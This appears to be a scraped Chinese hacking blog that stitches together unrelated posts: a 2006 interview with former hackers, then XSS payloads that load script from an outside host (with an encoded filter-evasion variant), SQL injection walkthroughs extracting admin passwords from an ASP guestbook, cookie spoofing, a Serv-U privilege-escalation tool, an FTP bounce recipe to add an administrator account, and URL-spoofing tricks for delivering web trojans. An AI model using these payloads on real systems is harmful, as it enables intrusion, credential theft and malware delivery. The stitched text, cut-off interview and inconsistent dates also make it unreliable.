Chinadu's Blog

互联网大会三天，新网、宝洁、反黑客官方网站相继被黑，再次把黑客推向前台。在黑客工具日益泛滥，黑客攻击频繁的被利用成为市场竞争手段的今天，黑客未来的走向越来越受到社会各界的强烈关注，顶尖黑客做客南方IT沙龙，网易科技为你独家解密。
[最新消息]
中国万网9月29日晚遭黑客大规模攻击

[近期黑客事件回顾]

宝洁中国网站被黑客攻破 留言要求SK-II滚出中国

域名服务商新网遭黑客攻击 约20%中国网站瘫痪

黑客公然叫嚣"黑客在此" 百度新网不是最后一个

百度遭史上最大规模黑客攻击 搜索报障30分钟

嘉宾：
谢朝霞 深圳安络科技副总裁
陈三堰 广州易城科技总经理
主持人：
网易财富中心总监：刘红鹰
网易科技：古丰

提醒：网友可以点击这里 到南方IT沙龙论坛与嘉宾互动和交流

比尔.盖茨也算得上黑客
古丰：最近黑客话题很火爆，在刚结束的2006中国互联网大会期间，三天内新网、宝洁、反黑论坛接连被黑了，为什么最近会出现这么多黑客行动呢？今天南方IT沙龙第六期非常荣幸请来了中国第一第二代的“黑客代表性人物”谢朝霞和陈三堰，当然了，黑客早年是爱国主义、网络高手的代名词，现在黑客往往被赋予更多负面的含义，今天两位嘉宾也早已经告别的所谓的黑客生涯，并在各自领域上有自己的成就，但相信两位对最近频频爆发的黑客事件有比较深刻的理解，我们先让两位简单介绍下自己。
谢朝霞：今天来广州首先感谢网易科技给我这个平台，我首先发表下声明，在中国，黑客这词已经被滥用，相信现在我已经可以作为为网络安全代表方来谈黑客这个话题。在2001年网络泡沫破裂后，一度出现很困难的情况，我们坚持下来把网络安全作为主营业务。现在困难已经过去，产业的前景不错。
刘红鹰：谢朝霞以前在江湖上的名号叫什么？
谢朝霞：老毒物是我早期聊天室的网名，后来传开了成为我的代号。
陈三堰：我来自第八军团，99年创办，感谢网易科技今天提供的机会。关于黑客，这个词已经被滥用了，我深有同感，现在也不想提到这个词语，一般人认为黑客是很神秘的人物，偷QQ，黑网站等，实际上真正的黑客不会这样做的。我的网名是陈三公子，99年华南理工大学毕业，之后做过老师，后来由于崇拜电脑报里的陈三公子，取这个名字也是因为崇拜，目前主要从事网络安全行业。
刘红鹰：很有个性的两位家宾，从你们的个人经历开始向我们的网友讲解下如何？
谢朝霞： 很有必要在开始讨论前，对黑客这个词做个定义和划分，HACKER本意是做一件漂亮事件的人。公认为互联网最早的HACKER是写操作系统的人，包括比尔.盖茨等人，他们是最早对互联网做出贡献的人，也能称得上黑客。目前黑客有三种类型是公认的，一是对网络有贡献的人，二是发现漏洞的人，三是利用攻击手段的人。白帽子是做兵器的，黑帽子是用兵器去杀人的。还有介于中间的灰帽子。网络安全公司里有很多曾经被称为黑客的人，他们不是金盆洗手，他们是把自己的技术应用在对社会有益的地方。他们是白帽子。还有发现漏洞，促使厂商发布补丁的也是正义的黑客。
陈三堰：对于谢朝霞对黑客的定义，我基本认同。刚才说的，黑客注重工具，这点实际上很多黑客也非常注意对于漏洞的研究及工具的制作,可能对于骇客来讲对于黑客工具的依赖会比较强.
刘红鹰：今天很有意思的细节是，二位被称为黑客，却都穿着白衣服，是不是有意告诉别人你们不是黑客？如果现在叫你们黑客，你们愿意么？
陈三堰：实际上我更欣赏的是黑客的学习态度及研究的精神.但是并不因此就可以称之为黑客,我们也是在经历一个学习的过程,别人认为我们是黑客,而自己感觉可能离心目中的黑客距离还很远,这与每个人心中对黑客的理解有关。

中国有500万黑客 攻击百度小孩也能做到
刘红鹰：在普通网友心目中，黑客更多的是攻击者，拿到数据的和黑帮等，可能这些人的行为会被认为在现实社会中的所不能表达的抗议的行为，在中国，这些情绪，生存的压抑，未来的走向，二位是不是可以描述下中国的黑客的发展历史经历了或正经历着什么变化？
陈三堰：中国的黑客出现在95年，那时才是真正意义上的黑客，后来可能又出现了为体现技术的黑客，最近居然出现了犯罪的黑帮，给你发邮件，恐吓你。社会的发展，导致黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。当然也有最近的事件，是没有任何目的的趋势。黑客现在缺少正确的引导，网络上很多工具，普通人都可以学会相关教程，黑客工具如果被小孩子们学会，如果没有正确的引导，这部分群体就会走向极端。目前我们所看到的，基本都是小孩子们在玩游戏，黑掉网站，挂上自己的QQ，我们看来，这样的行为很搞笑
古丰：您觉得百度、新网是小孩子们能黑的吗？
陈三堰：有些小孩子们可以完成，有很多小孩子手上有很多肉鸡，他们利用很多“肉鸡”发起拒绝服务攻击。前几天反黑官方网站被黑，就是一个小孩子做的，他给我发过图片显示过他的成果,“拥有肉鸡近三千台”，他觉得很有成就感。
古丰：为什么会在2006中国互联网大会三天每天就有一个网站受到黑客攻击呢？会不会是一种有计划有预谋的集中攻击行为？
陈三堰： 新网被黑我不大清楚具体细节，关于为啥选择再大会期间发动密集的攻击行为，可能有人是为了故意制造新闻，这样才能广受关注。
谢朝霞：关于具体事实和情况我不大清楚。从我的经验来看，攻击每时刻都在发生，我觉得互联网大会期间巧合的可能性更大。
刘红鹰：您们被江湖中称为第一代第二代的黑客，你什么时候被称为黑客的，从你的经历来看，黑客会往什么方向发展？
谢朝霞：我不清楚谁给我封上南帝的封号，我唯一的特点可能是从事业内的人中年龄大点。从事安全行业，不可能不对攻击有所了解。我说过黑客分三种。只说白帽、灰帽、黑帽。白帽子黑客的发展将来更多的会在技术上和产品上提供价值。白帽子完全有能力去银行调动数据库，但这是违法的，用同样的能力不如把自己的公司做大。我相信网络安全这个行业会越来越重要，比如电子政务，网上银行，网络游戏，对于网络安全要求很大，因此白帽子的利润空间很大。目前来讲，全球具备攻击能力的人有2000万，按3％－5％比例来算，中国黑客数量也差不多有300-500万。
刘红鹰：一般的攻击手段很多，都有什么，怎么防范？
陈三堰一般设备上有，操作系统，还有第三方软件都有漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段可能是拒绝服务，这个是缺陷，可修改为:网络设备漏洞，操作系统漏洞，还有第三方软件漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段
可能是拒绝服务，这个是网络协议本身的缺陷。中国的网站很脆弱，目前包括电子政务方面，安全意识很差。而另一方面来说，一些黑客，会在发展遇到障碍的时候，会转行做其他。
有钱的企业最容易受到攻击
刘红鹰：继百度、新网之后，谁最可能成为下一个被攻击的目标？
谢朝霞：有钱的网站和有钱的公司。
刘红鹰：是原生态的人做的还是公司的人做的？
谢朝霞：按目前安全状况来说，因此攻击的成本会越来越高，目的性越来越强。将来从底层攻击的难度会加大，从应用层攻击的会更多，邮件，应用程序，脚本等等方面。面对应用，就要对应用进行研究。因此攻击的成本会很过，目的性更高。
古丰：百度被黑的成本多高？如果你是百度的CTO你会怎么应对？
谢朝霞：更准确说，百度事件是堵塞，这个成本并不是很大的。百度对一般的拒绝服务攻击应该可以化解的。他们有财力。我们安全服务中有这样的服务。如果我百度CTO，一我要加大对主机和安全的投入，二要做好应急措施。这样的攻击是消耗战，你有不同的预案，是可以防范的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家、个人、组织去下手。
黑客攻击是行侠仗义还是利益驱动
刘红鹰：百度被黑的事情，大家都觉得是正义的表现，二位觉得中国的黑客这样的行为更多的是正义的行为还是经济上的目的？

陈三堰： 对百度的了解来说，从前段裁员说，很多人觉得是值得同情的，应该发泄，SK-II也是这样被黑，可能有些高手会表达这样的愤怒的心情。大部分来说，很多高手都有正义感的，但有些事情不是一般小黑客能做的。当然，也越来越多黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。
谢朝霞： 我认为百度被攻击的事件，从目前法律定义来看，国际上是被定义为恐怖行为的，中国已经加入这个协定的，有义务要进行调查的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家，个人，组织去下手。无论什么原因，去攻击一个网站，这个做法是不可取的，目前我国对攻击网站等黑客行为的查处和打击力度在加大，有攻击能力的其行为稍有不慎可能会成为公安部门的查处对象。如果被攻击方足够有钱，愿意花代价的话，即使拒绝服务攻击，也是甚至可以查出来的。
黑客攻击成为市场竞争手段
观众提问：前段时间各大网站被黑事件，我个人认为有炒作的原因。我所了解，很多做网站的人都被攻击的话，被攻击的流量很大，这样的攻击是机房控制呢还是肉鸡比较多呢？
谢朝霞： 您讲的这个情况，我们有过了解。这样的行为往往是网站经营者之间互相攻击的，办网站的人有很好的带宽，甚至会花钱去攻击他们的竞争对手。可能是有组织的，起因还是商业竞争。
观众：如果是竞争对手攻击，现在新浪、搜狐、网易三大门户也好，搜索巨头百度、google等竞争对手很多，他们应如何面对黑客威胁？
谢朝霞： 我的亲身经历，2000初，我正在融资，那天就有人攻击我，我正演示给投资商看的时候就被攻击，后来我恢复后，攻击持续了一个月后停止，由此，我认为只要被自己的防范做好，就可以了。攻击时间太长长，就容易被查出来。

陈三堰： 我们的防火墙每秒都被人检测入侵，我们不知道是谁，只能自己采取措施去防范，往往有时候攻击也就持续一个月就会停掉。有客户找我们，有损失的，但是对于拒绝服务方面还是办法很少。我们有句话是，只有绝对的不安全，没有绝对的安全。
黑客还会为爱国挺身而出吗？
观众提问：政府如果需要黑客们保家卫国，黑客还会不会像中美黑客大战那样站出来？
谢朝霞： 从我们公司来讲，我们只是做到培训，防范，分析，技术发现。我觉得做到这一点，已经足够了，我们提供了防范手段，告诉了客户用途和手段。个人来讲，我也只会做到培训。
陈三堰：个人来说，特殊时期，你年轻的时候，可能会做些，成年时，除非特别需要，可能会考虑协助。这个问题有些尖锐，私聊更合适。对于爱国情感，每个人都会有的。
谢朝霞： 我要补充，您的问题有猜测。据我了解，只要国家不打仗，就没有网络上的行为。所有的目前的行为，都是个人行为。和平时期，做攻击行为的法律我国与其他国家一样，是有规定的，不可能有组织的。一般的攻击都是个人行为。
网络安全太昂贵 中小企业怎么保护自己
观众提问：我对黑客没认识，没兴趣，但我有个问题，二位多在网络安全方面的公司，网络安全只给国家，给能出得起钱的企业做，但对我们小企业来说，成本太高了，二位你们经营的企业，你们的客户群是怎样定位，我们没有财力的公司，能提供给我们什么服务，给我们什么建议？
谢朝霞： 安全是要成本的，先问你，你能出多少钱？
观众提问：需要看我们付出安全的成本与我们不做安全付出的代价哪个高？你们的服务适合什么人群？
谢朝霞： 您愿不愿意投入您的成本的10-15%来做网络安全。
观众：初期不会，发展大了会，正如正版软件一样，开始不会，公司大了不得不用。
谢朝霞： 我们的服务里有为中小企业服务的，一个月不会超过几百块，基本上满足中小企业的安全需求。行业运营的平台，也差不多可以做的。服务有软件加重大事件上门服务，一般事件的电话支持。
刘红鹰：有一个安全成本的问题，到底一个企业要多少安全成本可以得到安全保障？
陈三堰：很多创业型企业需要考虑很多，公司小的时候，觉得安全成本过高不愿做，大了就不会选择我们这些较小规模的网络安全公司。国内有300多家安全企业走的高端路线，低端服务走的还是很少，可能跟利润少有关系。对于安全厂商，确实很不好做。
刘红鹰：中国安全产业的市场有多大？
陈三堰： 据CNNIC最新公布的调查数据，截止2008年，中国安全市场达105亿。
刘红鹰：转型做安全工作以后，你们现在活得好么？
谢朝霞：现在企业投入的都不一样，很多小企业很少甚至没有，而很多大企业的投入很大甚至浪费。但总体来说，安全市场我们追求的是IT市场5%-10%。
刘红鹰：有黑客放出话，国内几大网站一夜间会被黑掉，有可能吗？
陈三堰：如果说用比较高级拒绝服务来实现或许有可能，这会考虑到"黑"到一个什么样的度,而局部一个小程序，可能是会找到漏洞，但整体被黑掉，是很难的。整个互联网还是很脆弱的，美国科学家的一项研究表明，似乎无所不能的互联网，却有着"阿克琉斯之踵"，只要几个关键环节被破坏，整个互联网将在瞬间瘫痪。[阿克琉斯是希腊神话里的无敌英雄，可一旦被射中右脚后跟，就会訇然倒地，软弱无力。]新网这次就是一个典型案例。
谢朝霞： 网络应用和网络安全一定要投入成本，安全是可以得到很大保

sql通用防注入3.1最终纪念版开发完毕,与3.1beta版相比有以下的更新：
对于3.1beta版中由于加入的对于js程序过滤的功能而引起的安全问题做了修正。
对于3.1beta版可能引起的跨站攻击做了修正。
将3.1beta版中的安全表单升级为安全页面，使程序的针对性更强，下面将做演示！
如无大的问题，此版本为最终纪念版，以后本人将不再对此程序做更新！
点击下载

在IE里面直接输入以下代码：


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);

来自：s0n9'5 B1o9

在XSS中如何再插JS

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>


字符过滤怎么办?用Encode加密后就无敌了~

未加密前

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" "onerror"="window.execSript(decodeURI(this.XSS),'Jscript.Encode');" >


加密后

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs+ or(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " "onerror"="window.execSript(decodeURI(this.XSS),'Jscript.Encode');" >


嘿嘿~刺激吧~再怎么用你自己实验吧.

一.注入漏洞

漏洞文件edit.asp admin_editly.asp searchresult.asp

edit.asp代码分析：

<%
  dim id
    id=request("id")
    set rs=server.createobject("adodb.recordset")
    sql="select * from [guest] where id="&id
rs.open sql,conn,1,3
if rs("sessionid")=session.sessionid then
%>


一个典型的sql注入漏洞，程序用request直接获取id的值，没有经过任何的过滤，但是注意一下程序利用的

是session验证，也就是说，只有登陆后台，才有权限来构造语句。

admin_editly.asp代码分析：


<%
dim guestcontent
dim id
id=request("id")
guestcontent=request("guestcontent")
    set rs=server.createobject("adodb.recordset")
    sql="select guestcontent,id,sh from [guest] where id="&id
       rs.open sql,conn,1,3
if guestcontent<>"" then
rs("guestcontent")=guestcontent
rs("sh")=false
        rs.update
rsclose()
connclose() 
response.redirect "manage.asp"
end if
%>


漏洞与edit.asp如出一辙。同样直接获取id的值，没有任何过滤。虽然这里没有session验证，但是此文件的

开始有这么一句就是说 先得通过chkmanage.asp的验证才有权限登

陆这个页面。

searchresult.asp代码分析：

搜索型注入，everyone可以写。不用任何验证，它便是我们今天的主要对象。


<%
dim keyword
keyword=trim(request("keyword"))
classid=request("classid")
set rs=server.createobject("adodb.recordset")
if classid="留言内容" then
sql="select * from guest where guestcontent like '%"&keyword&"%'"
elseif classid="回复内容" then
sql="select * from guest where guestreply like '%"&keyword&"%'"
else
sql="select * from guest where guestname like '%"&keyword&"%'"
end if
rs.open sql,conn,3,1
Rs.pagesize=listnum
    page=Request("page")
    if (page-Rs.pagecount) > 0 then
    page=Rs.pagecount
    elseif page = "" or page < 1 then
    page = 1
    end if
%>


注意keyword这个变量 只用trim函数过滤掉了空格 显然没有过滤完全。

大家注意它的sql的查询方式，我们必须通过 关键字%' and [我们构造的语句] and '% 构成一个闭合查询语句

比如我们构造这个语句：keyword%' and 1=1 and '% 那么程序在执行的时候就会变成：

select * from guest where guestcontent like '%关键字%' and 1=1 and '%%'

这样就实现了注入。

这里我们在实际做的时候会遇到一些问题，但是我们可以本地提交。大家来看代码：


<INPUT maxLength=12 size=28 name=keyword>


程序限制了长度 12个字节 问题是 我们构造语句 12个是一定会超出的,这样的话 我们就以把searchresult.asp

这个文件保存到本地，然后补全action后面的url 在把maxlength改为120嘿嘿 够长了吧。。。。

关键字%' and ascii的值=(select top 1 asc(mid(password,1,1)) from admin) and '%

com%' and 97=(select top 1 asc(mid(username,1,1)) from admin) and '%

如果正确 则返回正常页面 否则程序会alert("没有符合条件的记录")

二.跨站漏洞

save.asp

server.HTMLEncode(guestname)<>guestname or InStr(guestname," ")<>0 or InStr(guestname," ")<>0 or InStr(guestname,"【")<>0 or InStr(guestname,"】")<>0 or InStr(guestname,"/")<>0 or InStr(guestname,"\")<>0 or InStr(guestname,"_")<>0 or InStr(guestname,"'")<>0 or InStr(guestname,".")<>0 


代码比较乱，但是我们可以看出htmlencode这个函数 肯定是一个过滤非法字符的。它就位于

我们来读下它的代码。


function HTMLEncode(fString)

    fString = replace(fString, ">", ">")

    fString = replace(fString, "<", "<")

    fString = Replace(fString, CHR(13), "")

    fString = Replace(fString, CHR(10) & CHR(10), "</P><P>")

    fString = Replace(fString, CHR(10), "<BR>")

    HTMLEncode = fString

end function


过滤掉了 很多跨站常用的字符。。。可以那么说，这里的跨站几乎是没戏了。。。那么我们把眼光移动到另

一个文件上。。。

undate_eidtnote.asp

这个文件 没有包含刚刚我们说的 char.asp 这个文件，那么跨站就成为轻而一举的事情了。。。


<%
notetitle=request("notetitle")
notebbs=request("guestcontent")
set rs=server.createobject("adodb.recordset")
sql="select notetitle,notebbs,notedate from [lybconfig] where id=1"
rs.open sql,conn,1,3
rs("notebbs")=(request("guestcontent"))
rs("notetitle")=(request("notetitle"))
rs("notedate")=Date()
    rs.update
rsclose()
connclose() 
%>


还是一样 直接获取 没有过滤。。。

构造语句：


<script>alert("品透泡菜")</script>


挂马代码：


<iframe src=http://www.baidu.com width=100 


放到公告栏里就行了。。。

但是该文件开头有那么一句

也就是说 只有登陆后台 才有权限来搞....

三.cookies欺骗

username=管理员名字&password=MD5加密&randomid=随便写数字

四.总结

由于这个留言簿的功能很简单，从它或者webshell比较困难，但是这个留言本可以说是一个插件，

如果你的运气够好的话，这个留言本的后台密码也许就是主站的后台密码。。。

这样获得webshell的几率就高了。。。

Powered by pintoupaocai

Google推出了Code Search，方便程序员进行源代码搜索，可是转眼间，便有无数或黑或白帽的“安全工作者”们，找出了Google代码搜索的另类使用方式，比如：

digg上发布的Finding Passwords with Google Code
ComputerWorld上发表的Hackers find use for Google Code Search

与以往的Google Hacking一样，潜藏在Google那庞大数据库中的，究竟是什么样的力量？
嗯，瞅一眼搜出来的WordPress密码吧……知道是如何搜的吗，点这里试试

体会到尽收眼底的感觉了吗？

Serv-U提权综合工具 by 执着我一生[F.S.T]

=============
说明
=============
1.生成的文件都和本程序在同一目录下。[被杀自己想办法:)]

2.口令读取的方法比较笨，要和版本正确对应，否则读不出来。目前支持的版本还不全。

3.使用过程中，如果你发现什么Bug或是有好的建议请与我联系。不胜感激！

4.开发环境：VC6.0sp6 + XPSP2

用ASProtect加壳

文件md5校验值：5377a1ae7994a100d8207a833cfa8542

ps：感谢狗剩兄弟的无私帮助!!![告诉我动态定位读取口令的方法，本人不才，还不能完美实现，目前

还在改进中:)]

=============
声明
=============

1.本软件仅供技术研究,请不要用于非法用途.对使用本软件造成的任何后果作者一概不负责!

2.本软件为免费软件,您可以随意使用但请不要对软件进行更改,传播过程中也请您保持软件的完整性.版权归原作者执着我一生[F.S.T]所有.

=============
联系方式
=============

My Blog: http://www.allife.org

Email : elong2008@126.com

QQ : 61006284

      http://127.0.0.1/dangjian/read.asp?articleid=154%20AND%201=(SELECT%20%20top%201%201%20from%20MSysAccessObjects
　　测试sandbox是否打开，报错则未打开
　　http://127.0.0.1/dangjian/read.asp?articleid=154%20AND%201=(SELECT%20%20top%201%20cudir()%20from%20MSysAccessObjects
　　Microsoft JET Database Engine (0x80040E14)
　　表达式中 'cudir' 函数未定义。
　　发送数据：
　　SELECT id FROM users WHERE username ='1'and password='' union SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=<Server>,<Port>; DATABASE=master; Trusted_Connection=Yes].Information_Schema.Tables where '1'='1'or'1'='1'

 

首先，你得拥有美服英文版的魔兽世界客户端

>>点击进入本站美服客户端下载页面<<

然后，装好你的美服客户端，并且将美服客户端升级到国服客户端目前的版本（1.12.0）

点击下载美服1.12.0升级补丁 （下载地址已修复）

升级完成，然后把美服版的realmlist.wtf 和 wow.exe 保存起来，以备以后更新用。从中文版的客户端拷过这两个文件，用记事本打开realmlist.wtf 把里面的改成：set realmlist "cn1.grunt.wowchina.com" 保存，就OK了。当然，CN1是一区的，其他区的自己改下就OK了。

OK，然后如下操作：

如果你没有用中文版登陆过你的人物，用英文版WOW联上国服，当选你的中文名人物时，系统会提示你的名字不符合规范，要你输入一个新的名字，点取消，退出。

如果你用国服客户端登陆过你的人物，用中文版WOW联上国服，建立1个中文名的人物，用英文版登陆，删除刚才那个建立的人物，退出。

最后，用中文版WOW进游戏，点你的人物名,也会出现改名框，然后你就可以改成中文名了。

Author：lake2 ( http://lake2.0x54.org )

FTP反弹攻击（FTP Bounce Attack）是很古老的技术了，居然能在我们的信息安全教材上找得到介绍，可见其确实年代久远。

所谓FTP反弹攻击就是利用FTP协议的PORT命令将数据发送到第三方，这样就可以利用FTP服务器实现对其他机器的端口扫描和发送数据了。由于这种攻击的存在，所以FTP服务器一般都限制了PORT命令的ip地址为客户端ip且端口大于1024。

现在比较流行的FTP软件Serv-U默认情况下（似乎？）却没有限制FTP Bounce攻击，造成安全隐患。

以下是对有限制的Serv-U进行反弹攻击：



220-欢迎光临lake2的blog

user lake2

331 User name okay, need password.

pass xxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

530 Only client IP address allowed for PORT command.



失败了，因为管理员在设置那里勾上了“拦截FTP Bounce攻击”。

但是，一些Serv-U却可以实现反弹（默认情况下没有阻止FTP Bounce）：



220-欢迎使用本虚拟主机.

user 0x54.org

331 User name okay, need password.

pass xxxxxxxxxxxx

230 User logged in, proceed.

port 127,0,0,1,171,182

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

226-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

226 Transfer complete.

port 127,0,0,1,171,183

200 PORT Command successful.

list

150 Opening ASCII mode data connection for /bin/ls.

426-Maximum disk quota limited to 204800 kBytes

Used disk quota 81766 kBytes, available 123033 kBytes

426 Data connection closed, transfer aborted.



命令“port 127,0,0,1,171,182”就是把数据发送到FTP服务器的43958（171*256+182=43958）端口，因为该端口是开放的，所以数据发送成功；第二次把数据发送到43959端口，该端口关闭，所以发送失败。根据返回的结果，就实现了端口扫描（由于限制，只能扫描大于1024的端口）。大名鼎鼎的扫描器NMAP就有利用FTP反弹实现端口扫描的功能。

利用反弹攻击也可以发送任意数据，把要发送的数据写到文件中然后RETR就行了。既然可以发送任意数据，当然包括向43958端口发送添加有执行权限的FTP用户的命令咯。这真是个令人兴奋的主意。

以下内容保存为test.txt并传到FTP根目录：



user LocalAdministrator

Pass #l@$ak#.lk;0@P

SITE MAINTENANCE

-SETUSERSETUP

-IP=0.0.0.0

-PortNo=21

-User=lake

-Password=admin123

-HomeDir=c:\

-LoginMesFile=

-Disable=0

-RelPaths=1

-NeedSecure=0

-HideHidden=0

-AlwaysAllowLogin=0

-ChangePassword=0

-QuotaEnable=0

-MaxUsersLoginPerIP=-1

-SpeedLimitUp=0

-SpeedLimitDown=0

-MaxNrUsers=-1

-IdleTimeOut=600

-SessionTimeOut=-1

-Expire=0

-RatioUp=1

-RatioDown=1

-RatiosCredit=0

-QuotaCurrent=0

-QuotaMaximum=0

-Maintenance=None

-PasswordType=Regular

-Ratios=None

Access=c:\|RWAMELCDP





然后retr test.txt，添加用户的数据就发过去了。

每次都莫名其妙的添加失败，后来试验多次才发现是由于数据发送太快43958端口那边还没来得及响应连接就就关闭了。解决办法是在test.txt文件前面添加许多无用数据，当文件达到1M多的时候，哈哈，成功了！

以上是在5.2版本的情况，但在6.3版本上，情况不妙，43958端口限制了接收数据大小，几十K都不行了，何况一个1M的大文件呢。

这个地方一直没想到好的解决办法，似乎有两点思路供参考：

1、 上传/下载大文件，降低其处理速度

2、 对FTP服务器进行拒绝服务攻击，消耗资源降低处理速度

以上只是猜想没有去实践，姑且叫“lake2猜想”吧，谁把它解决了，我请吃饭哦^_^

华中科技大学提供的Windows自动更新服务
本服务使用微软提供的 Microsoft Software Update Services (SUS) Server 建设

1.速度快，不会产生国际流量，国内用户也可使用 Windows Update 自动更新服务。
2.彻底解决了不能激活的 Windows XP/Windows Server 2003 的在线更新升级问题。

目前支持Windows 2000/Windows XP/Windows Server 2003简体中文/英文 两种语言的Windows操作系统，不支持Windows 9x/Me/NT。
1.Windows 2000 SP3及之后版本，Windows XP SP1及之后版本，Windows Server 2003都已内置自动更新(Automatic Update)服务，可以直接运行自动配置脚本(个人用户 服务器)；
2.Windows 2000 SP2，Windows XP没有内置自动更新服务，需要先下载自动更新程序(中文版 英文版)，再运行自动配置脚本；
3.Windows 2000 SP1及之前版本，需要先安装 SP4(中文版 英文版)，再运行自动配置脚本。

使用方法：
1.把 update.zip 中的三个文件解压缩到本地硬盘任一目录下；
2.进入对应目录，双击运行其中的 update.bat 即可。
3.一般运行完更新脚本后更新并不会立刻开始，需要等待一段时间(30min以内)，一旦发现有新的更新存在会立刻自动给出下载安装的提示(屏幕右下角会冒出来一个图标)以及各种更新的详细说明。

运行配置脚本后，您的电脑会周期性（一般为一天一次）定时去服务器上检查最新的系统漏洞补丁列表并提示您是否有系统安全补丁需要下载(屏幕右下角会多出来一个图标，点击查看)，如果您同意，系统会自动下载，下载完成后会再次询问您是否安装(屏幕右下角会多出来一个图标，请再次点击查看)。

注意：更新并不是立刻开始，需要等一段时间（30min以内），使用此更新同微软的在线升级并无冲突，您仍然可以随时访问 http://www.windowsupdate.com 来进行在线升级。

附件中提供了该更新服务的脚本程序，你也可以去华中科技大学的网站下载，有任何疑问也可以查询华中科技大学的网站：http://windowsupdate.hust.edu.cn

本文已发表于<黑客X档案>杂志第9期..邪恶八进制首发..转载请注明版权.
作者BLOG:http://www.ciker.org/

第7期的X档案<挂马,别忘了还有phpwind论坛>一文中提及到URL欺骗的方式引起了我极大的兴趣..就自己动手试了一下..发现作者提供的代码有点问题.

作者提供的完整代码为

<p><a id ="exploit" href="http://网马地址"></a></p>
<div>
<a herf ="http://www.163.com/" target="_blank">
<table>
<caption>
<a herf ="http://www.163.com" target="_blank">
<lable for ="exploit">
<u styke = "cursor:pointer:color:black">
www.163.com
</u>
</lable>
</a>
</caption>
</lable>
</a>
</div>


单从这一句就可以看到这段代码是错的.因为连接的代码应该是为href才对..这里作者不细心犯下了一个错误.很容易误导我们的读者..所以要提醒各位作者以后写稿时千万要注意.

我们只需把代码中的herf替换为href就可以了..保存代码后访问此页面测试..我发现并不像作者说的那样"表面上指向的连接是www.163.com,其实真实的连接是我们的网马地址"

打开页面后显示www.163.com,,当我们鼠标放上去的时候状态栏显示的http://www.163.com/..点击之后打开的还是www.163.com.
下面的代码是我从EST里找来的..


<p><a id="SPOOF" href="http://localhost/"></a></p>
<div>
<a href="http://www.163.com" target="_blank">
<table>
<caption>
<label for="SPOOF">
<u style="cursor: pointer; color: blue">
www.163.com
</u>
</label>
</caption>
</table>
</a>
</div>



对比一下就会发现第一个代码比以上的这个代码多了一条

就因为这么一句代码错误..导致了欺骗不成功...

既然我们知道了错误所在.
下面我们就以实例来演示一下URL欺骗.保存以上代码为任意文件名.但后缀要是htm文件. 打开此文件.看到www.163.com我们把鼠标移动上去,会看到状态栏显示为http://www.163.com/
图1


最终打开的还是http://localhost/ 图2
http://photo9.yupoo.com/20060929/124342_1431775110_ainxpsjh.jpg
实际运用中可以把http://localhost/换为你自己的网页木马地址..

既然说到了URL欺骗的问题..下面我就介绍下另外几种URL欺骗的方式
我们先来看一下URL的结构组成

大部分Internet用户把WWW地址或FTP同URLs联系起来,但Uniform Resource Locators(URL 统一资源定位器)使用的更普遍一些.URLs的标准在RFC1738中规定,其中最普通的形式定义为:
:
部分是网络协议名称，部分被定义为：
//: @: /
其中只有部分是必须的. ":"和"@"字符具有特殊的含义,从而服务器可以解析完整的字符串.如果用户名和密码包含在URL中,部分只是从"@"字符后开始.

看看一个欺骗的例子: http://www.163.com@www.hackerxfiles.net
其中真正的主机是"www.hackerxfiles.net"."www.163.com"在这个URL中不过是个假的用户名,服务器会忽略它.最终打开的页面是
www.hackerxfiles.net 由于前面的地址为www.163.com.因为大家都知道这个站.比较信赖于它.所以这起了个很好的欺骗作用.

不过有一点需要说明的是http://www.163.com@www.hackerxfiles.net在最新的IE6.0里使用的话会提示语法错误.但是如果对方使用的是第三方浏栏器.比如Maxthon,腾讯TT,GreenBrowser的话.依然可以欺骗..IE6.0以下的都可以通过.

上面关于URL的分析只是简单的隐藏了它的真实目的地.我们可以用更好的方法来进行隐藏.由于某些原因(有可能是内部处理引起的),有的操作系统对IP地址的操作并不是通过我们常用的格式,就象是:aaa.bbb.ccc.ddd,而是相应的十进制数.

http://127.0.0.1/这类地址可以改写成十进制的值http://2130706433/.在浏览器中输入http://2130706433/你会发现你已经打开了http://127.0.0.1/这个主页..以上操作在IE6.0测试无效..所以很有些局限性.

接着介绍点分八进制和点分十六进制的加密.EST 的VIP MET特为此写了一个加密程序.

从图3中可以看到我们用点八分进制加密IP127.0.0.1的结果为http://0177.00.00.01/
在浏览器中输入http://0177.00.00.01/ 会看到我们打开了127.0.0.1这个页面...如图4

点分十六进制加密127.0.0.1后得到http://0x7F.0x0.0x0.0x1/ 在浏览器打开http://0x7F.0x0.0x0.0x1/ 会得到同样的结果..这里就不在演示里..

此软件还提供了一个URL加密 图5


待加密URL可以为IP也可以为域名.这里我以www.hackerxfiles.net演示.点击加密后得到
http://%77%77%77%2E%68%61%63%6B%65 ... C%65%73%2E%6E%65%74/
在浏览器输入http://%77%77%77%2E%68%61%63%6B%65 ... C%65%73%2E%6E%65%74/打开的就是黑客X档案的主页..

当然URL欺骗的方式是多种多样的..本文只是介绍了几种常见的..如果大家有什么更好的欺骗方法欢迎到X论坛与我交流.

用到的工具下载..

点击下载